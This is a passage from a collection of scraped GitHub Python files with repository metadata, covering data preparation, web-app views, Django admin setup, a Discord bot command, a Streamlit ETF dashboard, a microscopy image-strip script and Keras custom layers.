train = dem.loc[start_index:]\n except:\n train = dem\n \n def prepare_data(data):\n data['hour'] = data.timestamp.apply(lambda x: int(x.split(\":\")[0]))\n data['minutes'] = data.timestamp.apply(lambda x: int(x.split(\":\")[1]))\n data['t'] = ((data['day']-1)*(24*60)+data['hour']*60+data['minutes'])/15\n data['t_day'] = (data['t']%(24*4))\n data['t_week'] = (data['t']%(24*28))\n data['dayofweek'] = data.day%7\n data = data.sort_values([\"geohash6\",\"t\"])\n data.index = range(len(data))\n return data\n train = prepare_data(train)\n last_t = train[train.timestamp==last_entry.timestamp].t.max()\n train = train[train['t']<=last_t]\n\n return train, next_day, next_time_str\n\ndef prepare_data_for_cluster(data):\n \"\"\"\n This function return normalized data for each day, each geohash6\n \"\"\"\n by_t_day = data.groupby([\"geohash6\",\"dayofweek\",\"t_day\"]).demand.mean().unstack().fillna(0)\n mean_across_t = by_t_day.mean()\n std_across_t = by_t_day.std()\n by_t_day_norm = (by_t_day-mean_across_t)/std_across_t\n mean_across_geo = by_t_day_norm.mean(axis=1)\n std_across_geo = by_t_day_norm.std(axis=1)\n by_t_day_norm = (by_t_day_norm.T-mean_across_geo)/std_across_geo\n return by_t_day_norm\n\ndef cluster(data_norm):\n \"\"\"\n For each geohash, each day, we learn the daily pattern series\n and then put them into a separate cluster --> label them based on the cluster\n \"\"\"\n train = data_norm.T\n km = KMeans(random_state=1, n_clusters=8)\n clusters = km.fit_predict(train)\n clustered = pd.Series(clusters, index=train.index)\n clustered_piv = clustered.unstack().T\n clustered_piv = clustered_piv.fillna(clustered_piv.median(axis=0))\n result = clustered_piv.unstack().reset_index().rename(columns={0:'time_cluster'})\n return result\n\ndef 
get_fourier(data_piv):\n \"\"\"\n For each geohash, we get the top 5 fourier values\n \"\"\"\n freq = np.fft.rfftfreq(len(data_piv.columns), 1.0)\n ffs = []\n top_5_freqs_dict = {}\n top_5_amplis_dict = {}\n for i in range(len(data_piv)):\n the_data = data_piv.iloc[i]\n f = np.abs(np.fft.rfft(the_data))\n top_5 = pd.Series(f, index=freq).iloc[1:].sort_values(ascending=False).head(5)\n top_5_freqs_dict[the_data.name] = top_5.index\n top_5_amplis_dict[the_data.name] = top_5.values\n ffs.append(f)\n \n ffs_df_ = pd.DataFrame(ffs,index=data_piv.index,columns=freq)\n agg_fouriers_df = ffs_df_.iloc[:, 1:].max().sort_values(ascending=False).reset_index()\n top_5_freqs_df = pd.DataFrame(top_5_freqs_dict, index=[\"fft_f_\"+str(i) for i in range(5)]).T\n top_5_amplis_df = pd.DataFrame(top_5_amplis_dict, index=[\"fft_a_\"+str(i) for i in range(5)]).T\n return top_5_freqs_df, top_5_amplis_df, agg_fouriers_df\n\ndef get_n_previous_demand(df, list_n):\n \"\"\"\n Get the previous demand values (t-1, t-2, etc) based on list_n\n \"\"\"\n demand_shifts = []\n for i in list_n:\n the_shift = df.T.shift(i).unstack()\n the_shift.name = \"d-\"+str(i)\n demand_shifts.append(the_shift)\n demand_shifts_df = pd.concat(demand_shifts, axis=1).dropna()\n return demand_shifts_df\n\ndef augment_data(raw_data):\n \"\"\"\n raw_data is whatever data provided (input) from the csv file\n This function converts raw_data into train data\n \"\"\"\n temp, n_day, n_time = get_14_days_data(raw_data)\n temp_norm = prepare_data_for_cluster(temp)\n clustered = cluster(temp_norm)\n\n # get demand for eact unique time \"t\"\n by_t = temp.pivot_table(index=\"geohash6\",columns=\"t\",values=\"demand\").fillna(0)\n\n # get fourier values\n top_5_freqs, top_5_amplis, agg_fouriers = get_fourier(by_t)\n\n # get latlon for each geohash\n latlon = map(lambda x: geohash.decode_exactly(x), top_5_amplis.index)\n loc = pd.DataFrame({\n 'lat': [x[1] for x in latlon],\n 'lon': [x[0] for x in latlon]\n },\n index=top_5_amplis.index)\n \n # merge fourier and location\n var_add = pd.concat([top_5_freqs, top_5_amplis, loc], axis=1)\n\n # get previous demand values\n selected_periods = [1,2,3,4,5,6,7,8,96,192]\n ds = get_n_previous_demand(by_t, selected_periods)\n\n # create training data\n base = temp[[\"geohash6\",\"t\",\"demand\",\"dayofweek\",\"hour\",\"minutes\",\"timestamp\",\"day\"]]\n base = pd.merge(ds.reset_index(), base, how=\"right\", on=[\"geohash6\",\"t\"]).dropna()\n base = pd.merge(base, clustered, on=[\"geohash6\",\"dayofweek\"], how=\"left\")\n base = pd.merge(base, var_add.reset_index().rename(columns={'index':'geohash6'}), how=\"left\", on=\"geohash6\")\n base = base.sort_values([\"geohash6\",\"t\"])\n base.index = range(len(base))\n\n # return training data and table of all previous demands\n return base, by_t\n\n\n","repo_name":"nmonarizqa/grab-tm","sub_path":"prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70222523754","text":"from flask import current_app as app\nfrom flask_login import current_user\nfrom app.blueprints.shop.models import Cart, Product\nfrom functools import reduce\n\n@app.context_processor\ndef display_cart_info():\n cart_list = {}\n if current_user.is_authenticated:\n cart = Cart.query.filter_by(user_id=current_user.id).all()\n if len(cart) > 0:\n for i in cart:\n p = Product.query.get(i.product_id)\n if i.product_id not in cart_list.keys():\n cart_list[p.id] = {\n 'id': 
i.id,\n 'product_id': p.id,\n 'quantity': 1,\n 'name': p.song_name,\n 'song_artist': p.song_artist,\n 'price': p.price,\n 'tax': p.tax,\n }\n else:\n cart_list[p.id]['quantity'] += 1\n else: \n return { \n 'cart': {\n 'items': cart,\n 'display_cart': cart_list.values(),\n 'tax': round(reduce(lambda x,y:x+y, [i['tax'] for i in cart_list.values()]), 2) if len(cart_list.values()) > 0 else 0,\n 'subtotal': round(reduce(lambda x,y:x+y, [i['price'] for i in cart_list.values()]), 2) if len(cart_list.values()) > 0 else 0,\n 'grand_total': round(reduce(lambda x,y:x+y, [i['price'] + i['tax'] for i in cart_list.values()]), 2) if len(cart_list.values()) > 0 else 0\n }\n }\n else:\n return {\n 'cart': {\n 'items': [],\n 'display_cart': [],\n 'tax': float(0.00),\n 'subtotal': float(0.00),\n 'grand_total': float(0.00)\n }\n }","repo_name":"enavs/music_project","sub_path":"app/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41316586067","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport statistics\nfrom typing import List\n\n'''\nThis file provides measuring functions\n'''\n\ndef getChannelUsageInEpochSeries(epochSeries : pd.Series, featureSeries : bool, printUsage=False):\n ''' Count how often each channel is represented in the given sereies of epochs \n \n @param epochSeries: A series of epochs, can be a normal epoch series or feature epoch series\n @param featureSereies: If true then we have to count different, \n because the feature epoch series has the channel in the index\n (and the other in the columns)\n @parm printUsage: Prints the most used channels\n\n @return: A list of the most used channels by descending order\n ''' \n\n foundChannels = {}\n\n if featureSeries: # feature epoch series\n for epoch in epochSeries: # loop through the epochs\n for index, row in epoch.iterrows(): # loop through the rows\n try:\n foundChannels[index] += 1\n except KeyError: # if not in the dict, add it\n foundChannels[index] = 1\n\n else: # normal epoch series\n for epoch in epochSeries:\n #for columns in epochSeries[1].columns:\n for columns in epoch.columns:\n try:\n foundChannels[columns] += 1\n except KeyError: # if not in the dict, add it\n foundChannels[columns] = 1\n\n\n #sortedFoundChannels = sorted(foundChannels.items(), key=lambda item: item[1], reverse=True) # sort by found times\n\n mostUsedChannelsListDesc = []\n\n for key, value in sorted(foundChannels.items(), key=lambda item: item[1], reverse=True): # sort by found times\n if printUsage:\n print(\"{} used {} times\".format(key, value))\n\n mostUsedChannelsListDesc.append(key)\n\n return mostUsedChannelsListDesc\n\n\ndef faultyFeaturesNames(df : pd.DataFrame, maxPercentageMissing = 0.0) -> pd.Series:\n ''' Measure the most stable feature, by counting the NaN Values and return a series of columns which are not acceptable\n\n Return a list of column names where the maximum percentage is higher then the given parameter\n So the returned columns are not acceptable and have to be deleted.\n If no column name gets returned then every column is below or equal of 'maxPercentage'\n '''\n if df is None:\n return df\n \n percent_missing = df.isnull().sum() * 100 / len(df)\n missing_value_df = pd.DataFrame({'column_name': df.columns,\n 'percent_missing': percent_missing})\n \n missing_value_df.sort_values('percent_missing', inplace=True)\n \n missing_value_df = 
missing_value_df[missing_value_df['percent_missing'] > maxPercentageMissing]\n return missing_value_df['column_name']\n\ndef countRecordsOfDf(df : pd.DataFrame) -> int:\n ''' Count a df with checks if its empty or None '''\n if df is None or df.empty:\n return 0\n else:\n return len(df)\n\n\ndef calculateMeanOverEpochs(valueList : List, numberOfEpochs : int = 5) -> List:\n ''' Calculate the mean over a given number of epochs\n e.g. if numberOfEpoch is 5 then the mean will get calculated from epoch 0-4; 5-9; 10-14; ...\n \n @param valueList: A list of values, where each entry represnts one epoch\n @param numberOfEpochs: A number which defines how many epochs should included in the calculations\n '''\n meanValueList = []\n start = 0\n end = numberOfEpochs\n for i in range(0, len(valueList), numberOfEpochs):\n meanValue = statistics.mean(valueList[start:end])\n meanValueList.append(meanValue)\n start += numberOfEpochs\n end += numberOfEpochs\n\n return meanValueList\n\ndef calculateStandardDeviationOverEpochs(valueList : List, numberOfEpochs : int = 5) -> List:\n ''' Calculate the standard deviation over a given number of epochs\n e.g. if numberOfEpoch is 5 then the standard deviation will get calculated from epoch 0-4; 5-9; 10-14; ...\n \n @param valueList: A list of values, where each entry represnts one epoch\n @param numberOfEpochs: A number which defines how many epochs should included in the calculations\n '''\n stDev_valueList = []\n start = 0\n end = numberOfEpochs\n for i in range(0, len(valueList), numberOfEpochs):\n value = statistics.stdev(valueList[start:end])\n stDev_valueList.append(value)\n start += numberOfEpochs\n end += numberOfEpochs\n\n return stDev_valueList","repo_name":"mudo121/thesis_eeg","sub_path":"code/Measuring_Functions.py","file_name":"Measuring_Functions.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20341488700","text":"from typing import Union\nfrom variable import DdExpression\n\n\nclass NodeManager:\n\n def __init__(self):\n self.node_cache = {}\n\n def new_node(self, node_expr: DdExpression, low_expr: DdExpression = None, high_expr: DdExpression = None):\n return self.node_cache.setdefault((node_expr,\n low_expr if low_expr is not None else None,\n high_expr if high_expr is not None else None),\n Node(node_expr))\n\n\nclass XADDFactory:\n\n def __init__(self):\n pass\n\n\nclass Node:\n\n def __init__(self,\n val_func: Union[DdExpression,float,int],\n low_node: 'Node'=None,\n high_node: 'Node'=None) -> None:\n val_func = val_func if isinstance(val_func, DdExpression) else DdExpression(val_func)\n self.val_func = val_func\n self.low_node = low_node\n self.high_node = high_node\n","repo_name":"TomMcL/xadd","sub_path":"factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40533707480","text":"from django.contrib import admin\nfrom .models import *\nimport admin_thumbnails\nfrom django.db.models import ManyToManyField\nfrom django.forms import CheckboxSelectMultiple\n\n# Register your models 
here.\nadmin.site.register(Japan_clothes),\nadmin.site.register(Japan_clothes_Comment),\nadmin.site.register(Japan_foods),\nadmin.site.register(Japan_others),\nJapan_clothes_Comment\nadmin.site.register(USA_clothes),\nadmin.site.register(USA_foods),\nadmin.site.register(USA_others),\n\nadmin.site.register(Vietnam_clothes),\nadmin.site.register(Vietnam_foods),\nadmin.site.register(Vietnam_others),\n\n#커뮤니티 기능\nclass CommentInLine(admin.TabularInline):\n model = Comment\n extra = 1\n\n@admin_thumbnails.thumbnail(\"photo\")\nclass PostImageInLine(admin.TabularInline):\n model = PostImage\n extra = 1\n \n@admin.register(Post)\nclass PostAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"title\",\n \"content\",\n \"thumbnail\",\n ]\n inlines = [\n CommentInLine,\n PostImageInLine,\n ]\n formfield_overrides = {\n ManyToManyField: {\"widget\":CheckboxSelectMultiple},\n }\n\n@admin.register(PostImage)\nclass PostImageAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"post\",\n \"photo\",\n ]\n\n@admin.register(Comment)\nclass CommentAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"post\",\n \"content\",\n ]\n\n@admin.register(HashTag)\nclass HashTagAdmin(admin.ModelAdmin):\n pass","repo_name":"pookey1104/Savior","sub_path":"savior/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"39751008939","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom core.models import Author\nfrom .serializers import AuthorSerializer, BookSerializer\nfrom core.models import Book,Author,Genre\nfrom .permissions import IsAdminOrReadOnly\n\nclass BooksByAuthor(APIView):\n permission_classes = [IsAdminOrReadOnly]\n \n def get(self,request,slug):\n \n if Author.objects.filter(slug = slug).exists():\n print(\"Author Exists\")\n books = Book.objects.filter(author__slug = slug)\n if books:\n serializer = BookSerializer(books,many=True,context={'request':request})\n return Response(serializer.data)\n else:\n return Response({\"Error 404\":\"No books from this Author\"})\n\n else:\n return Response({\n \"Error 404\": \"Author does not Exist.\"\n })\n \n def post(self,request,slug):\n \n if Author.objects.filter(slug = slug).exists():\n author = Author.objects.get(slug = slug)\n serializer = BookSerializer(data = request.data,context={'request':request})\n if serializer.is_valid():\n serializer.save(author = author)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n else:\n return Response({\n \"Error 404\": \"Author does not Exist.\"\n })\n\nclass BooksByGenre(APIView):\n permission_classes = [IsAdminOrReadOnly]\n def get(self,request,slug):\n if Genre.objects.filter(slug=slug).exists():\n \n books = Book.objects.filter(genre__slug = slug)\n if books:\n serializer = BookSerializer(books,many=True,context={'request':request})\n return Response(serializer.data)\n else:\n return Response({\"Error 404\":\"Books by Requested Genre does not exist.\"})\n \n else:\n return Response({\"Error 404\":\"Requested Genre does not exist.\"})\n \n def post(self,request,slug):\n \n if Genre.objects.filter(slug = slug).exists():\n genre = Genre.objects.get(slug = slug)\n print(genre)\n serializer = BookSerializer(data = request.data,context={'request':request})\n if serializer.is_valid():\n serializer.save(genre = genre)\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n else:\n return 
Response({\n \"Error 404\": \"Genre does not Exist.\"\n })\n","repo_name":"Alexeino/KLIB_API","sub_path":"core/api/by_views.py","file_name":"by_views.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39926369952","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nclass AverageMeter:\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.nums = 0\n self.sum = 0 \n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.nums = 0\n self.sum = 0\n \n def update(self, val, n=1):\n self.val = val\n self.sum += val\n self.nums += n\n self.avg = self.sum / self.nums\n ","repo_name":"QiliangFan/NoduleDetection","sub_path":"network/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39273837726","text":"import json\nimport discord\n\nfrom random import choice\nfrom discord.ext import commands\nfrom resources.check import check_it\nfrom resources.db import Database\n\nwith open(\"resources/auth.json\") as security:\n _auth = json.loads(security.read())\n\ncolor = int(_auth['default_embed'], 16)\n\n\nclass DrawUsers(object):\n def __init__(self, bot):\n self.bot = bot\n\n @check_it(no_pm=True)\n @commands.check(lambda ctx: Database.is_registered(ctx, ctx))\n @commands.cooldown(1, 5.0, commands.BucketType.user)\n @commands.command(name='draw', aliases=['sorteio'])\n async def draw(self, ctx):\n draw_member = choice(list(ctx.guild.members))\n member = discord.utils.get(ctx.guild.members, name=\"{}\".format(draw_member.name))\n embed = discord.Embed(\n title=\"``Fiz o sorteio de um membro``\",\n colour=color,\n description=\"Membro sorteado foi **{}**\\n <a:palmas:520418512011788309>│``Parabens!!``\".format(member)\n )\n embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url)\n embed.set_footer(text=\"Ashley ® Todos os direitos reservados.\")\n embed.set_thumbnail(url=member.avatar_url)\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(DrawUsers(bot))\n print('\\033[1;32mO comando \\033[1;34mSORTEIO\\033[1;32m foi carregado com sucesso!\\33[m')\n","repo_name":"PatchKnow/Ashley","sub_path":"commands/utility/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31430368184","text":"def facto(n):\n if n==1 or n==0:\n return 1\n else:\n return n * facto(n-1)\nn = int(input(\"Enter a Number : \"))\nprint(facto(n))\n\n\n\ndef fact1(n):\n if n<0:\n return \"invalid input\"\n elif n==0 or n==1:\n return 1\n else:\n fact=1\n while n>1:\n fact*=n\n n-=1\n return fact\nn=5\nprint(fact1(n))","repo_name":"BhushanAmbilkar/Real_Time_python_interview_question","sub_path":"Python/FactorialOfNum.py","file_name":"FactorialOfNum.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72263925033","text":"import streamlit as st\nimport pandas as pd\nimport requests\nimport altair as alt\n\nst.title(\"ETF Composition\")\n\ndf = pd.read_csv('data/blackrock_fr.csv')\n\nchoice = st.selectbox(\"Select a fund\", df.Fund.unique())\n\nselected_fund = df[df.Fund == choice].drop(columns=['Fund']).copy()\nselected_fund['Weight (%)'] = selected_fund['Weight (%)'].round(2)\n\nsectors = 
selected_fund.groupby('Sector')['Weight (%)'].sum()\nregions = selected_fund.groupby('Location')['Weight (%)'].sum()\nasset_classes = selected_fund.groupby('Asset Class')['Weight (%)'].sum()\n\ncol1, col2, col3 = st.columns(3)\ncol1.metric(\"Top 10 concentration\", value=f\"{selected_fund.iloc[:10]['Weight (%)'].sum():.0f}%\")\ncol2.metric(\"Largest sector\", value=f'{sectors.max():.0f}%', delta=sectors.idxmax(), delta_color='off')\ncol3.metric(\"Largest region\", value=f'{regions.max():.0f}%', delta=regions.idxmax(), delta_color='off')\n\nst.header('Sectors')\nc_sectors = alt.Chart(sectors.sort_values().reset_index()).mark_bar().encode(\n x='Weight (%)',\n y=alt.Y('Sector', sort='-x'),\n tooltip=['Sector', 'Weight (%)']\n)\nst.altair_chart(c_sectors, use_container_width=True)\n\nst.header('Asset Classes')\nc_asset_classes = alt.Chart(asset_classes.sort_values().reset_index()).mark_bar().encode(\n x='Weight (%)',\n y='Asset Class',\n tooltip=['Asset Class', 'Weight (%)']\n)\nst.altair_chart(c_asset_classes, use_container_width=True)\n\nst.header('Regions')\nc = alt.Chart(regions.sort_values().reset_index()).mark_bar().encode(\n x='Weight (%)',\n y=alt.Y('Location', sort='-x'),\n tooltip=['Location', 'Weight (%)']\n)\nst.altair_chart(c, use_container_width=True)\n\nst.header('Holdings')\nst.dataframe(selected_fund)\n","repo_name":"hugolmn/finance-tools","sub_path":"pages/ETF Analyzer.py","file_name":"ETF Analyzer.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8211624938","text":"# import glob.glob\nimport skimage.io\nimport numpy as np\nimport PIL\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\n# import matplotlib.pyplot as plt\nimport os.path\n\n\ndef process_fp(im, ROI, min_fp, max_fp):\n lim = im.copy()\n lim[im < min_fp] = 0\n # rescale = skimage.exposure.rescale_intensity(im, in_range=(min_fp, max_fp), out_range=\"uint8\").astype(np.uint8)\n print(min_fp, max_fp)\n rescale = skimage.exposure.rescale_intensity(\n lim, in_range=(min_fp, max_fp), out_range=(0, 255)\n ).astype(np.uint8)\n # rescale = skimage.exposure.rescale_intensity(im, in_range=(0, max_fp), out_range=(0, 255)).astype(np.uint8)\n # plt.figure()\n # plt.hist(rescale.flatten(), bins=np.arange(1,256))\n # plt.show()\n cuted = rescale[ROI]\n return cuted\n\n\ndef process_phase(im, ROI, min_fp, max_fp):\n rescale = skimage.exposure.rescale_intensity(\n im, in_range=(min_fp, max_fp), out_range=\"uint8\"\n ).astype(np.uint8)\n cuted = rescale[ROI]\n return cuted\n\ndef min_to_hours(mins):\n hours = mins//60\n left = mins - (hours*60)\n return f\"{hours}h {left}m\"\n\ndef add_annotations(im, i):\n pilim = Image.fromarray(im)\n draw = ImageDraw.Draw(pilim)\n # font = ImageFont.truetype(<font-file>, <font-size>\n font = ImageFont.truetype(\"Arial\", 60)\n smallfont = ImageFont.truetype(\"Arial\", 30)\n # draw.text((x, y),\"Sample Text\",(r,g,b))\n # draw.text((0, 0), \"{0} mins\".format(i * 15), (255, 255, 255), font=font)\n draw.text((0, 0), min_to_hours((i-21) * 15), (255, 255, 255), font=font)\n try:\n annotation_list = arrow_locations[i]\n for arrow_loc, direct, num in annotation_list:\n actual_loc = (arrow_loc[0] - ROI[1].start, arrow_loc[1] - ROI[0].start)\n if direct == \"r\":\n draw.bitmap(actual_loc, arrpil_r, fill=(255, 255, 255))\n num_offset = (0, 0)\n else:\n draw.bitmap(actual_loc, arrpil, fill=(255, 255, 255))\n num_offset = (30, 0)\n num_loc = tuple([sum(x) for x in 
zip(actual_loc, num_offset)])\n draw.text(num_loc, \"{0}\".format(num), (256, 255, 255), font=smallfont)\n except KeyError:\n pass\n return np.array(pilim)\n\n\ndef add_no_over(a, b):\n r = a.copy()\n b = 255 - b\n np.putmask(r, b < r, b)\n r += 255 - b\n return r\n\n\n\"\"\" Original del RU movie \n path = \"movie_strip/sigB_biofilmpad6-O001_3-{0}-{1:03d}.tif\"\n start = 22\n end = 31\n outimage = \"sigB_biofilmpad6-O001_3_1\" \n #image_range = list(range(22, 33))\n image_range = list(range(23, 33))\n arrow_locations = { # in XY\n 22: (663, 552),\n 23: (665, 552),\n 24: (665, 559),\n 25: (670, 550),\n 26: (675, 535),\n 27: (675, 520),\n 28: (675, 520),\n 29: (685, 520),\n 30: (693, 510),\n 31: (693, 510),\n 32: (700, 510),\n } \n\"\"\"\nif __name__ == \"__main__\":\n this_dir = os.path.dirname(__file__)\n #rpath = \"/media/nmurphy/BF_Data_Orange/proc_data/biofilm_fig1/2015-11-03/sigB_biofilmfinal-B_4/images/sigB_biofilmfinal-B_4-{0}-{1:03d}.tif\"\n rpath = \"/media/nmurphy/Seagate Backup Plus Drive/proc_data/padmovies/2015-11-03/sigB_biofilmfinal-B_4/images/sigB_biofilmfinal-B_4-{0}-{1:03d}.tif\"\n path = os.path.join(this_dir, rpath)\n # image_range = list(range(22, 33))\n outimage = \"sigB_biofilmfinal-B_4_movie\"\n image_range = list(range(21, 40, 1))\n arrow_locations = {}\n # arrow_locations = { # in XY\n # 25: [((700, 558), \"l\", 1)], # 375\n # 26: [((703, 553), \"l\", 1)], # 390\n # 27: [((707, 585), \"l\", 1)], # 405\n # 28: [((695, 568), \"l\", 1)], # 420\n # 29: [((715, 565), \"l\", 1)], # 435\n # 30: [((720, 526), \"l\", 1)], # 450\n # 31: [((712, 536), \"l\", 1)], # 465\n # 32: [((718, 542), \"l\", 1)], # 480\n # 33: [((700, 565), \"l\", 2)], # 495\n # 34: [((670, 566), \"l\", 2)], # 510\n # 35: [((660, 560), \"l\", 2)], # 525\n # 36: [((662, 575), \"l\", 2),\n # ((550, 543), \"r\", 3) ], # 540 # tracking a different cell now\n # 37: [((650, 565), \"l\", 2),\n # ((520, 520), \"r\", 3)], # 555\n # 38: [((570, 510), \"l\", 3)], # 570\n # 39: [((550, 500), \"l\", 3)], # 585\n # 40: [((555, 490), \"l\", 3)] # 600\n # }\n yfp_images = [skimage.io.imread(path.format(\"y\", i)) for i in image_range]\n phs_images = [skimage.io.imread(path.format(\"p\", i)) for i in image_range]\n rfp_images = [skimage.io.imread(path.format(\"t\", i))[0, :, :] for i in image_range]\n print(yfp_images[0].shape, rfp_images[0].shape)\n max_yfp = 500 # 350 #np.max([ y.max() for y in yfp_images])\n # min_yfp = 254 #(max bacground)\n min_yfp = 269 # 300 #329 #(mean off cell)\n max_rfp = 500 # chosen\n min_rfp = 220 # chosen\n max_phase = np.max([y.max() for y in phs_images])\n min_phase = np.min([y.min() for y in phs_images])\n # ROI = (slice(300,760), slice(570, 780)) # Row Col\n ROI = (slice(300, 760), slice(500, 800)) # Row Col\n\n arrow = skimage.io.imread(os.path.join(this_dir, \"arrow_ang.tif\")) # [:, :,0]\n # skimage.io.imsave(\"arrow_ang.tif\", arrow)\n\n # rarrow = skimage.exposure.rescale_intensity(arrow.astype(float), out_range=(0,1.0))\n # rarrow = -1 * (rarrow - 1.0)\n # print(arrow.shape)\n arrpil = Image.fromarray(arrow) # , mode='L').convert('1')\n arrpil_r = arrpil.transpose(PIL.Image.FLIP_LEFT_RIGHT)\n\n proc_yfp = [process_fp(im, ROI, min_yfp, max_yfp) for im in yfp_images]\n proc_rfp = [process_fp(im, ROI, min_rfp, max_rfp) for im in rfp_images]\n proc_phase = [process_phase(im, ROI, min_phase, max_phase) for im in phs_images]\n # joined_phs = np.hstack(list([process_phase(im, i, min_phase, max_phase) for i, im in zip(image_range, phs_images)]))\n\n # YFP and phase\n color_indv = [\n 
np.dstack([p, add_no_over(p, y), p]) for y, p in zip(proc_yfp, proc_phase)\n ]\n # YFP RFP and phase\n # color_indv = [np.dstack([add_no_over(p, r), add_no_over(p, y), p]) for r, y, p in zip(proc_rfp, proc_yfp, proc_phase)]\n color_anotate = [add_annotations(im, i) for i, im in zip(image_range, color_indv)]\n # print(len(color_anotate))\n rows = 2\n imgs_in_row = len(color_anotate) // rows\n list_of_points = [((r * imgs_in_row), ((r + 1) * imgs_in_row)) for r in range(rows)]\n print(list_of_points)\n\n image_rows = [\n np.hstack(color_anotate[(r * imgs_in_row) : ((r + 1) * imgs_in_row)])\n for r in range(rows)\n ]\n final = np.vstack(image_rows)\n skimage.io.imsave(os.path.join(this_dir, outimage + \"_strip.png\"), final)\n skimage.io.imsave(os.path.join(this_dir, outimage + \"_strip.jpg\"), final)\n","repo_name":"npmurphy/biofilm_pulse","sub_path":"figures/figure_padmovies/make_movie_strip.py","file_name":"make_movie_strip.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31255337956","text":"import tensorflow as tf\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.layers import Layer\nfrom tensorflow.python.keras.layers.pooling import GlobalPooling2D\nfrom tensorflow.python.keras.optimizers import Adam\n\n\nclass ConditionalAdamOptimizer(Adam):\n def __init__(self, lr_decay_schedule=None, **kwargs):\n super(ConditionalAdamOptimizer, self).__init__(**kwargs)\n self.lr_decay_schedule = lr_decay_schedule\n\n if lr_decay_schedule.startswith('dropatc'):\n drop_at = int(lr_decay_schedule.replace('dropatc', ''))\n drop_at_generator = drop_at * 1000\n self.lr_decay_schedule_generator = lambda iter: tf.where(K.less(iter, drop_at_generator), 1., 0.1)\n else:\n self.lr_decay_schedule_generator = lambda iter: 1.\n\n def get_updates(self, loss, params):\n conditional_params = [param for param in params if '_repart_c' in param.name]\n unconditional_params = [param for param in params if '_repart_c' not in param.name]\n\n # print (conditional_params)\n # print (unconditional_params)\n\n print(len(params))\n print(len(conditional_params))\n print(len(unconditional_params))\n\n lr = self.lr\n self.lr = self.lr_decay_schedule_generator(self.iterations) * lr\n updates = super(ConditionalAdamOptimizer, self).get_updates(loss, conditional_params)[1:]\n self.lr = lr\n updates += super(ConditionalAdamOptimizer, self).get_updates(loss, unconditional_params)\n #updates.append(K.update_sub(self.iterations, 1))\n return updates\n\n\nclass Split(Layer):\n def __init__(self, num_or_size_splits, axis, **kwargs):\n super(Split, self).__init__(**kwargs)\n self.num_or_size_splits = num_or_size_splits\n self.axis = axis\n\n def call(self, inputs):\n splits = tf.split(inputs, self.num_or_size_splits, self.axis)\n return splits\n\n\nclass GlobalSumPooling2D(GlobalPooling2D):\n \"\"\"Global sum pooling operation for spatial data.\n # Arguments\n data_format: A string,\n one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, height, width, channels)` while `channels_first`\n corresponds to inputs with shape\n `(batch, channels, height, width)`.\n It defaults to the `image_data_format` value found in your\n Keras config file at `~/.keras/keras.json`.\n If you never set it, then it will be \"channels_last\".\n # Input shape\n - If `data_format='channels_last'`:\n 4D tensor with shape:\n 
`(batch_size, rows, cols, channels)`\n - If `data_format='channels_first'`:\n 4D tensor with shape:\n `(batch_size, channels, rows, cols)`\n # Output shape\n 2D tensor with shape:\n `(batch_size, channels)`\n \"\"\"\n\n def call(self, inputs):\n if self.data_format == 'channels_last':\n return K.sum(inputs, axis=[1, 2])\n else:\n return K.sum(inputs, axis=[2, 3])\n\n\nclass GaussianFromPointsLayer(Layer):\n def __init__(self, sigma=6, image_size=(128, 64), **kwargs):\n self.sigma = sigma\n self.image_size = image_size\n super(GaussianFromPointsLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.xx, self.yy = tf.meshgrid(tf.range(self.image_size[1]),\n tf.range(self.image_size[0]))\n self.xx = tf.expand_dims(tf.cast(self.xx, 'float32'), 2)\n self.yy = tf.expand_dims(tf.cast(self.yy, 'float32'), 2)\n\n def call(self, x, mask=None):\n def batch_map(cords):\n y = ((cords[..., 0] + 1.0) / 2.0) * self.image_size[0]\n x = ((cords[..., 1] + 1.0) / 2.0) * self.image_size[1]\n y = tf.reshape(y, (1, 1, -1))\n x = 